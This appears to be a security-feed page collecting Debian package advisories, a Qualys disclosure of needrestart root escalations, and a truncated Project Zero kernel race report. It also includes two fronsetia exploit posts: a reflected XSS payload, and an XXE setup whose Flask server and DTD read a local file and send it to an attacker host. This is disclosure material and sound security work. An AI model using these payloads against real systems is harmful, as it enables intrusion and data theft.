Debian Linux Security Advisory 5821-1 - Multiple security issues were discovered in Thunderbird, which could result in denial of service or the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5821-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
November 27, 2024                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : thunderbird  
CVE ID         : CVE-2024-11692 CVE-2024-11694 CVE-2024-11695  
                 CVE-2024-11696 CVE-2024-11697 CVE-2024-11699

Multiple security issues were discovered in Thunderbird, which could  
result in denial of service or the execution of arbitrary code.

For the stable distribution (bookworm), these problems have been fixed in  
version 1:128.5.0esr-1~deb12u1.

We recommend that you upgrade your thunderbird packages.

For the detailed security status of thunderbird please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/thunderbird

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmdHcv8ACgkQEMKTtsN8  
TjY7kQ/9HOqGp2HwtLMf7jRWdCtBtwsAVOvOiYsGNr18FJRzTEj8CTXsz2ucn4Bg  
9c79NfbbMKQghXNKApzbDJb5Q2AEl9feic1EdMvKKqkTQQmWTKkxaTyqIVZ6/j/E  
pc2FmyKJKwHpPDseEDbG5UAv+Ea5HEvKuVp2G7KmkmxHVyh8iaanaQlk6GNgdzYd  
mUoHdlLre+MXp39ZzMyIGRs2NFUEP4gme7EglldGq77JXRGwWB3IDpYk0SViYKu0  
znO2+ITE39crVBTIGapaf2QD3Dppvbz0hsULrrPwmkDqlK4OqFJyaRuxGyv/Mymv  
YRQcBHpV9BQO9Xcl/RrD7qDgLyEHgjpX+c4tBau4h1+7RejDUTNyO7zArOrBAwYS  
pqd97quGWe9sSZyOJj1pF/yQRct9WExbMAhqGbNt5zdET7BSb09GtiKywT/vQKBl  
VEIO0LsAPYx1G+2nzhwdqzIQu6ojk52R0w/jmeBknsSsFp9mbfI5KKwBtNXWSpT+  
3z3NkWfr/5kzbPERj2jkS5MV/RzAe4d7zgxpEUMySIzUujszWI9RXo77heGYQ9LW  
3QfRqRmTUCwBaEdhf7YIqiYtyG7B6OYIOJPasDxvErRoEXwJKXic/oPxYmyCS2gx  
dYsoZntZJOvtjFzfzVBS3nJTv7+4PBWmqZSE9sCsDfazbJzn/fw=  
=RVGl  
-----END PGP SIGNATURE-----

Debian Security Advisory 5821-1

Debian Linux Security Advisory 5820-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code, spoofing or cross-site scripting.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5820-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffNovember 27, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : firefox-esrCVE ID         : CVE-2024-11692 CVE-2024-11694 CVE-2024-11695                 CVE-2024-11696 CVE-2024-11697 CVE-2024-11699Multiple security issues have been found in the Mozilla Firefox webbrowser, which could potentially result in the execution of arbitrarycode, spoofing or cross-site scripting. For the stable distribution (bookworm), these problems have been fixed inversion 128.5.0esr-1~deb12u1.We recommend that you upgrade your firefox-esr packages.For the detailed security status of firefox-esr please refer toits security tracker page at:https://security-tracker.debian.org/tracker/firefox-esrFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmdHcXoACgkQEMKTtsN8TjbVxg/+NpPN+XZlnNqjVxWv48TJO30h6qh+Zf7SZ3ToyxKH/nvMEOKNsgbutlednaKDlfJbVa761JBSCVR/CyERS32hC+IGDdn9i5w0BS2IrMsPOnF/eU6OExgUr7rMMkPuKUp9+YGJJwfEDgqHWSGj0jr2S2HcyMAtx2vcINSIhzbIcO7xhxj6P4CGAA8/0l2eOq3YpclgYB23gP69arKDPj++AIv5lLpmg1bHr+aeXde9Am/roaEdvA6tK5PM4ay86TsSsMKjB9bQLjcpH8sHYoCt8VRA4qkCED2KAwQBxQ115imOoeRyJbRjWHpbIt9DEBxxsbYlQTldDhghV4YcsrIhEFaVY5zlDHYegEicxrCVoQJV0cHbpedeCp2otNEuM+crLl1l/CuSEeBkX2F1Ng1CM2/dGJpfuYN63mhO7Zs+UIuecqyLy7ZMe7Ucno2sNJnLPIwcx+zpQwLj/jUDzK89jzW4ZR6BQ5VOI2ex+blMsrYFKWuMoZhXpnlt7qC1/SzlseedwbyAeSXLBcLhMckXfshNsO/B6JmgluOb5i2BBLFlUOpSFwZdDoknaKxjXLF+EUhrV08R63pxKp5HZvsBiirQk1kfbhyReaaWjBn1nIOr5x0IASEGk+s4T80/s+5lJpGkqnzjwTK8bM58i7sN5qJIrJD2gAgtsXxyOYj02S4==Cop0-----END PGP SIGNATURE-----

Debian Security Advisory 5820-1

Debian Linux Security Advisory 5819-1 - Multiple security issues were found in PHP, a widely-used open source general purpose scripting language which could result in denial of service, CLRF injection or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5819-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffNovember 26, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : php8.2CVE ID         : CVE-2024-8929 CVE-2024-8932 CVE-2024-11233 CVE-2024-11234                  CVE-2024-11236Multiple security issues were found in PHP, a widely-used open sourcegeneral purpose scripting language which could result in denial ofservice, CLRF injection or information disclosure.For the stable distribution (bookworm), these problems have been fixed inversion 8.2.26-1~deb12u1.We recommend that you upgrade your php8.2 packages.For the detailed security status of php8.2 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/php8.2Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmdGKiQACgkQEMKTtsN8TjYO/xAAsbjq3KSRqKJYm9xZgKovwv+yyIvWC0d6FqSx9hhvuwthdyp9OGCJvUnSeM1eN9akh1akVMe/HQZ4VLiwVkRArHXsAGPcsIaqLKgmlC2Hi3nYgwES5sgBAW+rsDAuUA+pwIr43adM6b7ZQgogM0VJ0FChyZPB0F9vbjZ1fSTlPrLKTmSjIcovxxB2OiZbAit+PBe4hEtDJTdMaNrgHZwNZijXUH1r5Pa/SgchhQSdiUbrMKXzwS1n5eHRxQZOadVzyK2SoutyLWhXFBhFUInyh+A/wLcTItS7/0k1+Bbjzta4SNdP3DQrPnzeBIRsN48y3NmYNm8xCCPC2QyIawC2O7lUBw/Aah2poGH4CK5+vHdmpuMQb+H5M62od2flWY7PzXCBvcBbdqoIiFcu9VxyPoNEkDXnrQaHSdBGamvJ8pSUuH5AZHzxxgBXnRwYkK1RRcOkyceKgcQRZIq6jCW280p6RffFylaHp9j2cJ4cEcASPaaMuJGySc2Jf7XEFsNtxrSfUcKkzI550YcdPWPJy+EK9cpgKte4sGOXAVwE6YcTfLcbw6QGcdzBJ2of2M9qngUiDcvBB6CPw+QmYyz0eXfB8e0Tgv3KMKZTA6XNp+/CIu9Jn7QmUlaZiyjaQq1bezFioPhCPPbDggiGcNGSJrTFwIvYGCLySKXYWmIVVs4==L3u9-----END PGP SIGNATURE-----

Debian Security Advisory 5819-1

Debian Linux Security Advisory 5818-1 - Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5818-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
November 24, 2024                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : linux  
CVE ID         : CVE-2022-45888 CVE-2023-52812 CVE-2024-26952 CVE-2024-26954  
                 CVE-2024-35964 CVE-2024-36244 CVE-2024-36478 CVE-2024-36914  
                 CVE-2024-36915 CVE-2024-36923 CVE-2024-38540 CVE-2024-38553  
                 CVE-2024-41080 CVE-2024-42322 CVE-2024-43868 CVE-2024-43904  
                 CVE-2024-43911 CVE-2024-44949 CVE-2024-49950 CVE-2024-49960  
                 CVE-2024-49974 CVE-2024-49986 CVE-2024-49991 CVE-2024-50012  
                 CVE-2024-50036 CVE-2024-50067 CVE-2024-50072 CVE-2024-50126  
                 CVE-2024-50215 CVE-2024-50218 CVE-2024-50228 CVE-2024-50229  
                 CVE-2024-50230 CVE-2024-50232 CVE-2024-50233 CVE-2024-50234  
                 CVE-2024-50235 CVE-2024-50236 CVE-2024-50237 CVE-2024-50242  
                 CVE-2024-50243 CVE-2024-50244 CVE-2024-50245 CVE-2024-50247  
                 CVE-2024-50249 CVE-2024-50250 CVE-2024-50251 CVE-2024-50252  
                 CVE-2024-50255 CVE-2024-50256 CVE-2024-50257 CVE-2024-50259  
                 CVE-2024-50261 CVE-2024-50262 CVE-2024-50264 CVE-2024-50265  
                 CVE-2024-50267 CVE-2024-50268 CVE-2024-50269 CVE-2024-50271  
                 CVE-2024-50272 CVE-2024-50273 CVE-2024-50276 CVE-2024-50278  
                 CVE-2024-50279 CVE-2024-50280 CVE-2024-50282 CVE-2024-50283  
                 CVE-2024-50284 CVE-2024-50286 CVE-2024-50287 CVE-2024-50290  
                 CVE-2024-50292 CVE-2024-50295 CVE-2024-50296 CVE-2024-50299  
                 CVE-2024-50301 CVE-2024-50302 CVE-2024-53042 CVE-2024-53043  
                 CVE-2024-53052 CVE-2024-53054 CVE-2024-53055 CVE-2024-53057  
                 CVE-2024-53058 CVE-2024-53059 CVE-2024-53060 CVE-2024-53061  
                 CVE-2024-53063 CVE-2024-53066 CVE-2024-53070 CVE-2024-53072  
                 CVE-2024-53081 CVE-2024-53082 CVE-2024-53088 CVE-2024-53093

Several vulnerabilities have been discovered in the Linux kernel that  
may lead to a privilege escalation, denial of service or information  
leaks.

For the stable distribution (bookworm), these problems have been fixed in  
version 6.1.119-1.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmdDS8lfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0QwLw/+OVgV3FTBaH3iV5PLBx/mLJH6xhNQeHzzlQXnREHfueWblf9QSCjRGHkl  
3ZlIvTKIEp7K5mNjqLBzbDjRNWijJdcDPqEp8dVET9Xwvht6AOX3C/oZpIPlLKkf  
ei0vJSUVIselsK5WfndPi19gR/Y0asKUF+XK47nchELEkZX9r+Mv36yib4z2z4b8  
K0iUtpInS5krLrqHTJbo8tJZ69C7a+U12KYGhzbDFSGM39mDhKWQ/gmloxjXHu8K  
sS84Z4SwWMll1pcjfiFVeD669zUS/VHR8Y34s2pjPwqqIejDORUZbFc6FQhP+Vk6  
PJVAAPWv0n39Ag1gQ21/BQis+b2CcC9CHWuMaG6ELQ/8HmcTCQkCOwzCCPN2woMy  
mLLK2gR6hEU+zuBs4Pg7jvdAeznbCmG28WfR9FO+WO410rWc7+IL5vcbGDGUVNu2  
vIq+R6GKqUC+6maOxc78NKFuU0c09hvK6UHiTuFlFScSI1vhg8mIxSbwWEpVlDA/  
dRXWkGneZ+2/gqUBGK31X295irixsNjvjjipMB4K28WSqeaQdJh2IMgIViL05/TL  
4jJELIIpcizck336YsfY9Ylfc0lqdqumbzZnM3ifm3nGeOc6zK5bZmn5YLxju/qk  
xmj6u8WD5je+Dm8OCWWF22SPNSJ3xoaqchKKQSYwow3G1nqEqKI=  
=lqjj  
-----END PGP SIGNATURE-----

Debian Security Advisory 5818-1

Debian Linux Security Advisory 5817-1 - Security issues were discovered in Chromium which could result in the execution of arbitrary code, denial of service, or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5817-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonNovember 23, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-11110 CVE-2024-11111 CVE-2024-11112 CVE-2024-11113                  CVE-2024-11114 CVE-2024-11115 CVE-2024-11116 CVE-2024-11117                  CVE-2024-11395Security issues were discovered in Chromium which could resultin the execution of arbitrary code, denial of service, or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 131.0.6778.85-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmdBrIQACgkQZF0CR8NudjdsBw/+J+eOgiIrU4hNq1Fk3HAontTf7sOIp3snoI5FvNnZ9oZT8qFbRJ+cfj17S2ZijYGoZKaqydWQgO/kh6eL/k7mHpM0KYLlALxaGevLxh3M4eJx8Il83YKVtx23Eh6G6YZ8itXZXb+E0f7jNRRAWb6S6OCwImk6incDq4k48IdB3zKKOzCTZQBb7vr1OaP+4kbjGgzGy9vv+iYNgE4sBHa3MOmIqZ4zcDxazK7ypw6W0M7UW6raeFI+pjK3nh4rjgy/UpK0u+wpRprif53rC7D5qP9vRO7wnRajw2pUoovFl+1bnpi8njwK3JbZom5ARWozEtT2nfef1nmtyXUQ5bjcKlQTW5kxrqMNwXyzCxB3N7ln1l09ubaA7TdYj0TxNQiNimeGnTULrkMTKcs1d077dZZ6XTZAUrwVZiJn8V4QxaCW3Ype7hgPsd/edRJMZT5G+J2vB86WBmKt0FyKD2fmRUuq2DGqCnbd3+5A/3krQBcwgHXAHyxkJpLWNs1bdcRlOac6BKe1N7oZeJKtofhfwRrmhilDCM85Q4OcxOY2VeSuxMEPtw6hAUoYwiuhUS4hT2DUmevPu/XtkoNE/X0WoJ9cN+hlOxqfjzhXlcyJiGk36BYKhE+KJvUsOfB5N8TqUEzGGbvOyXDy7QGsCUZJ+BwjOGKFh45L0Nb4dexvsL4==J21V-----END PGP SIGNATURE-----

Debian Security Advisory 5817-1

Qualys discovered that needrestart suffers from multiple local privilege escalation vulnerabilities that allow for root access from an unprivileged user.

  
Qualys Security Advisory

LPEs in needrestart (CVE-2024-48990, CVE-2024-48991, CVE-2024-48992,  
CVE-2024-10224, and CVE-2024-11003)

========================================================================  
Contents  
========================================================================

Summary  
Background  
CVE-2024-48990 (and CVE-2024-48992)  
CVE-2024-48991  
CVE-2024-10224 (and CVE-2024-11003)  
Mitigation  
Acknowledgments  
Timeline

    I got bugs  
    I got bugs in my room  
    Bugs in my bed  
    Bugs in my ears  
    Their eggs in my head  
        -- Pearl Jam, "Bugs"

========================================================================  
Summary  
========================================================================

needrestart (from https://github.com/liske/needrestart) is a Perl tool  
that is installed by default on Ubuntu Server since version 21.04. From  
https://discourse.ubuntu.com/t/needrestart-changes-in-ubuntu-24-04-service-restarts:

------------------------------------------------------------------------  
  What is needrestart, exactly?

  needrestart is a tool that probes your system to see if either the  
  system itself or some of its services should be restarted. That last  
  part is the one of interest in this document. Notably, a service is  
  considered as needing to be restarted if one of its processes is using  
  a shared library whose initial file isn't on the system anymore (for  
  instance, if it has been overwritten by a new version as part of a  
  package update).

  We ship this tool in our server images, and it is configured by  
  default to run at the end of APT transactions, e.g. when doing apt  
  install/upgrade/remove or during unattended-upgrades.  
------------------------------------------------------------------------

We discovered three fundamental vulnerabilities in needrestart (three  
LPEs, Local Privilege Escalations, from any unprivileged user to full  
root), which are exploitable without user interaction on Ubuntu Server  
(through unattended-upgrades):

- CVE-2024-48990: local attackers can execute arbitrary code as root by  
  tricking needrestart into running the Python interpreter with an  
  attacker-controlled PYTHONPATH environment variable.

  Last-minute update: an additional CVE, CVE-2024-48992, has been  
  assigned to needrestart because local attackers can also execute  
  arbitrary code as root by tricking needrestart into running the Ruby  
  interpreter with an attacker-controlled RUBYLIB environment variable.

- CVE-2024-48991: local attackers can execute arbitrary code as root by  
  winning a race condition and tricking needrestart into running their  
  own, fake Python interpreter (instead of the system's real Python  
  interpreter).

- CVE-2024-10224: local attackers can execute arbitrary shell commands  
  as root by tricking needrestart into open()ing a filename of the form  
  "commands|" (technically, this vulnerability is in Perl's ScanDeps  
  module, but it is unclear whether this module was ever meant to  
  operate on attacker-controlled files or not).

  Last-minute update: in the end, an additional CVE, CVE-2024-11003, has  
  been assigned to needrestart for calling Perl's ScanDeps module with  
  attacker-controlled files.

To the best of our knowledge, these vulnerabilities have existed since  
the introduction of interpreter support in needrestart 0.8 (April 2014).  
>From https://github.com/liske/needrestart#interpreters:

------------------------------------------------------------------------  
  needrestart 0.8 brings an interpreter scanning feature. Interpreters  
  not only map binary (shared) objects but also use plaintext source  
  files. The interpreter detection tries to check for outdated source  
  files since they may contain security issues, too. This is only a  
  heuristic and might fail to detect all relevant source files. The  
  following interpreter scanners are shipped:

  - NeedRestart::Interp::Java  
  - NeedRestart::Interp::Perl  
  - NeedRestart::Interp::Python  
  - NeedRestart::Interp::Ruby  
------------------------------------------------------------------------

We will not publish our exploits for now; however, please note that  
these vulnerabilities are trivially exploitable, and other researchers  
might publish working exploits shortly after this coordinated release.

========================================================================  
Background  
========================================================================

    And now the questions:  
    Do I kill them?  
    Become their friend?  
    Do I eat them?  
        -- Pearl Jam, "Bugs"

While idly watching an "apt-get upgrade" of one of our Ubuntu Servers,  
we noticed a message that we had never noticed before: "Scanning  
processes..."

We immediately wondered: What is printing this message? Is it scanning  
userland processes? As root? Even processes that do not belong to root?

We quickly found out that this message is printed by needrestart, a tool  
that scans the userland for processes that need to be restarted after a  
package installation, upgrade, or removal. Naturally, needrestart scans  
all userland processes as root, including unprivileged user processes;  
i.e., possibly attacker-controlled processes.

========================================================================  
CVE-2024-48990 (and CVE-2024-48992)  
========================================================================

To determine whether a Python process (a process that is running the  
Python interpreter) needs to be restarted, needrestart extracts the  
PYTHONPATH environment variable from this process's /proc/pid/environ  
(at line 193), sets this environment variable if it exists (at line  
196), and executes Python ("$ptable->{exec}" at line 203) with a "-"  
argument to read a short, hard-coded script from stdin (at line 204):

------------------------------------------------------------------------  
135 sub files {  
136     my $self = shift;  
137     my $pid = shift;  
138     my $cache = shift;  
139     my $ptable = nr_ptable_pid($pid);  
...  
193     my %e = nr_parse_env($pid);  
194     local %ENV;  
195     if(exists($e{PYTHONPATH})) {  
196         $ENV{PYTHONPATH} = $e{PYTHONPATH};  
197     }  
...  
203     my ($pyread, $pywrite) = nr_fork_pipe2($self->{debug}, $ptable->{exec}, '-');  
204     print $pywrite "import sys\nprint(sys.path)\n";  
205     close($pywrite);  
------------------------------------------------------------------------

Unfortunately, if a Python process belongs to a local attacker, then  
needrestart executes Python (at line 203) with an attacker-controlled  
PYTHONPATH environment variable, which allows the attacker to execute  
arbitrary code as root (even though needrestart's hard-coded Python  
script at line 204 is not attacker-controlled at all). This is  
CVE-2024-48990.

For example, in our exploit we run a simple Python process (which  
sleep()s forever) with a "PYTHONPATH=/home/jane" environment variable,  
and plant a shared library "importlib/__init__.so" in our /home/jane.  
As soon as needrestart executes Python with our PYTHONPATH environment  
variable (at line 203), our shared library is executed (by Python's  
initialization code) and creates a SUID-root shell in /home/jane.

Note: needrestart's support code for the Ruby interpreter seems equally  
vulnerable, but we have not investigated this any further, because  
(unlike Python) Ruby is not installed by default on Ubuntu Server.

Last-minute update: we have now confirmed that needrestart's support  
code for the Ruby interpreter is indeed vulnerable and exploitable,  
through an attacker-controlled RUBYLIB environment variable and an  
"enc/encdb.so" shared library. This is CVE-2024-48992.

========================================================================  
CVE-2024-48991  
========================================================================

To determine whether a process is indeed a Python process (a process  
that is running the Python interpreter, for example /usr/bin/python3),  
needrestart reads this process's /proc/pid/exe (at line 520), and then  
matches it against the regular expression at line 45:

------------------------------------------------------------------------  
 520         my $exe = nr_readlink($pid);  
 ...  
 606             $restart++ if(needrestart_interp_check($nrconf{verbosity} > 1, $pid, $exe, $nrconf{blacklist_interp}, $opt_t));  
------------------------------------------------------------------------  
166 sub needrestart_interp_check($$$$$) {  
167     my $debug = shift;  
168     my $pid = shift;  
169     my $bin = shift;  
170     my $blacklist = shift;  
171     my $tolerance = shift;  
...  
176         if($interp->isa($pid, $bin)) {  
------------------------------------------------------------------------  
 40 sub isa {  
 41     my $self = shift;  
 42     my $pid = shift;  
 43     my $bin = shift;  
 44   
 45     return 1 if($bin =~ m@^/usr/(local/)?bin/python([23][.\d]*)?$@);  
 46   
 47     return 0;  
 48 }  
------------------------------------------------------------------------

In fact, this code used to be vulnerable to CVE-2022-30688, a Local  
Privilege Escalation reported by Jakub Wilk: the regular expression at  
line 45 used to be unanchored (i.e., "/usr/(local/)?bin/python" instead  
of "^/usr/(local/)?bin/python([23][.\d]*)?$"), so local attackers could  
simply run their own, fake "/home/jane/usr/bin/python" (for example) and  
needrestart would later execute this fake Python interpreter as root (as  
if it were the system's real Python interpreter, at line 203).

We tried to bypass the fixed, anchored regular expression at line 45,  
but we failed. However, we eventually realized that the filename that is  
checked at line 45 is not necessarily the same filename that is executed  
at line 203: the filename that is checked is read from /proc/pid/exe in  
the middle of needrestart's main loop (at line 520), but the filename  
that is executed ("$ptable->{exec}" at line 203) was first read from  
/proc/pid/exe long before needrestart entered its main loop.

In other words, needrestart is vulnerable to a TOCTOU race condition  
(time-of-check, time-of-use). For example, our exploit /home/jane/race  
waits for needrestart to read our /proc/pid/exe for the first time (we  
use inotify to reliably win this race), and then quickly execve()s the  
system's real Python interpreter with a script that simply sleep()s for  
some time. As a result, needrestart does its checks on the real Python  
interpreter, but executes our own /home/jane/race instead, as root.

Note: needrestart's support code for the Ruby interpreter seems equally  
vulnerable, but we have not investigated this any further.

========================================================================  
CVE-2024-10224 (and CVE-2024-11003)  
========================================================================

After we had discovered CVE-2024-48990 and CVE-2024-48991 in  
needrestart's support code for the Python interpreter (and Ruby), we  
began to wonder whether the support code for the Perl interpreter might  
also be vulnerable to a Local Privilege Escalation.

Unlike needrestart's support code for Python and Ruby, the support code  
for Perl does not execute the Perl interpreter itself: instead, it calls  
the scan_deps() function from Perl's ScanDeps module, which analyzes a  
Perl script by recursively reading its source files.

We therefore grepped the ScanDeps module for one of the oldest pitfalls  
of the Perl programming language: the two-argument form of open(), which  
allows attackers to execute arbitrary shell commands if they control the  
name of the file to be open()ed (for example, "commands|"). For more  
information, please refer to rain.forest.puppy's 1999 Phrack article  
("That pesky pipe" section) and the SEI CERT Perl Coding Standard:

  https://phrack.org/issues/55/7.html#article  
  https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88890543

Incredibly, we found a match, at line 871 in ScanDeps.pm:

------------------------------------------------------------------------  
 868 sub scan_file{  
 869     my $file = shift;  
 870     my %found;  
 871     open my $fh, $file or die "Cannot open $file: $!";  
------------------------------------------------------------------------

In our exploit, we simply run a Perl script named "/home/jane/perl|"  
(which sleep()s forever), and as soon as needrestart calls scan_deps()  
to analyze our script, "/home/jane/perl|" is open()ed (at line 871), but  
because this filename ends with a "|" it is treated as a shell command,  
and our own "/home/jane/perl" is executed instead, as root.

Last-minute update: while reviewing needrestart's patches for these  
vulnerabilities, we have discovered that Perl's ScanDeps module is also  
trivially exploitable through various calls to eval() ("string" eval()s,  
https://perldoc.perl.org/functions/eval). Consequently and impressively,  
in response to our advisory:

- all of ScanDeps's vulnerable calls to open() and eval() have been  
  patched, thus fixing CVE-2024-10224;

- needrestart's dependence on ScanDeps has been completely removed (it  
  uses a simple regex-based approach now), thus fixing CVE-2024-11003.

========================================================================  
Mitigation  
========================================================================

As already recommended by needrestart's advisory for CVE-2022-30688  
(from https://www.openwall.com/lists/oss-security/2022/05/17/9):

------------------------------------------------------------------------  
Disabling the interpreter heuristic in needrestart's config prevents  
this attack:

 # Disable interpreter scanners.  
 $nrconf{interpscan} = 0;  
------------------------------------------------------------------------

========================================================================  
Acknowledgments  
========================================================================

We thank needrestart's maintainer (Thomas Liske), Module::ScanDeps's  
maintainers (Roderich Schupp in particular), the Ubuntu Security Team  
(Mark Esler in particular), and distros@openwall (Salvatore Bonaccorso  
from the Debian Security Team in particular) for their outstanding work;  
it has been a real pleasure to collaborate on this coordinated release.

We also thank Adam Boileau (@metlstorm) and Rodrigo Branco (@bsdaemon)  
for their very kind words about our work; they mean the world to us:

  https://risky.biz/RB755/  
  https://phrack.org/issues/71/2.html#article

========================================================================  
Timeline  
========================================================================

2024-10-04: We sent our advisory and exploits to the Ubuntu Security  
Team, and asked them if they could help us to coordinate this disclosure  
with the upstream projects and distros@openwall; they gladly accepted.

2024-10-08: The Ubuntu Security Team sent our advisory and exploits to  
needrestart's maintainer; we then started a very constructive exchange  
of patches and patch reviews.

2024-10-18: The Ubuntu Security Team opened GHSA-g597-359q-v529, a  
private GitHub repository to collaborate on this disclosure with  
Module::ScanDeps's maintainers.

2024-11-11: The Ubuntu Security Team sent our advisory and all of  
needrestart's and Module::ScanDeps's patches to distros@openwall.

2024-11-19: Coordinated Release Date (16:00 UTC).

needrestart Local Privilege Escalation

fronsetia version 1.1 suffers from a cross site scripting vulnerability.

    # Exploit Title: Reflected XSS - fronsetiav1.1# Date: 11/2024# Exploit Author: Andrey Stoykov# Version: 1.1# Tested on: Debian 12# Blog:https://msecureltd.blogspot.com/2024/11/friday-fun-pentest-series-14-reflected.htmlReflected XSS #1 - "show_operations.jsp"Steps to Reproduce:1. Visit main page of the application.2. In the input field of "WSDL Location" enter the following payload "><imgsrc=x onerror=alert(1)>// HTTP GET RequestGET/fronsetia/show_operations.jsp?Fronsetia_WSDL=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3EHTTP/1.1Host: 192.168.78.128:8080User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0)Gecko/20100101 Firefox/133.0[...]// HTTP ResponseHTTP/1.1 200Content-Type: text/html;charset=ISO-8859-1Content-Length: 6360Date: Wed, 20 Nov 2024 19:42:15 GMTKeep-Alive: timeout=20Connection: keep-alive[...]<title> Fronsetia: "><img src=x onerror=alert(1)> </title>[...]

fronsetia 1.1 Cross Site Scripting

fronsetia version 1.1 suffers from an XML external entity injection vulnerability.

    # Exploit Title: XXE OOB - fronsetiav1.1# Date: 11/2024# Exploit Author: Andrey Stoykov# Version: 1.1# Tested on: Debian 12# Blog:https://msecureltd.blogspot.com/2024/11/friday-fun-pentest-series-15-oob-xxe.htmlXXE OOBDescription:- It was found that the application was vulnerable XXE (XML External EntityInjection)Steps to Reproduce:1. Add Python3 server to serve malicious XXE payload2. Add a file on the file system to be read via the application XXE payloadecho 123123 > /tmp/1233. Enter the following URL as inputhttp://192.168.78.128:8080/fronsetia/show_operations.jsp?Fronsetia_WSDL=http://192.168.78.1:10000/testxxeService?wsdl// Python Server Codefrom flask import Flask, Response, requestimport loggingapp = Flask(__name__)# Set up logginglogging.basicConfig(level=logging.DEBUG)@app.route('/testxxeService', defaults={'path': ''})def catch_all(path):    app.logger.debug("Serving XXE payload")    xml = """<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE data [  <!ENTITY % dtd SYSTEM "http:// 192.168.78.1:10000/data.dtd"> %dtd;]><data>&send;</data>"""    return Response(xml, mimetype='text/xml', status=200)@app.route('/data.dtd', defaults={'path': ''})def hello(path):    app.logger.debug("DTD requested")    xml = """<!ENTITY % file SYSTEM "file:///tmp/123"><!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://192.168.78.1:8000/?content=%file;'>">%eval;%exfil;"""    return Response(xml, mimetype='text/xml', status=200)if __name__ == "__main__":    app.run(host='0.0.0.0', port=10000)

fronsetia 1.1 XML Injection

A security-relevant race between mremap() and THP code has been discovered. Reaching the buggy code typically requires the ability to create unprivileged namespaces. The bug leads to installing physical address 0 as a page table, which is likely exploitable in several ways: For example, triggering the bug in multiple processes can probably lead to unintended page table sharing, which probably can lead to stale TLB entries pointing to freed pages.

    SummaryI found a security-relevant race between mremap() and THP code. Reaching the buggy code typically requires the ability to create unprivileged namespaces. The bug leads to installing physical address 0 as a page table, which is likely exploitable in several ways: For example, triggering the bug in multiple processes can probably lead to unintended page table sharing, which probably can lead to stale TLB entries pointing to freed pages.I also found two other (untested) theoretical races, but those arguably might not even count as bugs, and I'm pretty sure they're not security bugs. I am including my analysis of the closely related non-issues 2 and 3 as context in case you're curious, but I think they're stuff we can deal with on the public list later (or maybe even just leave as-is). Feel free to ignore that part of this report.I will send a suggested patch for the security bug, but I think it's unclear if my patch is actually the right way to fix it.This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2024-12-31.For more details, see the Project Zero vulnerability disclosure policy: https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.htmlSecurity bug: move_normal_pmd vs 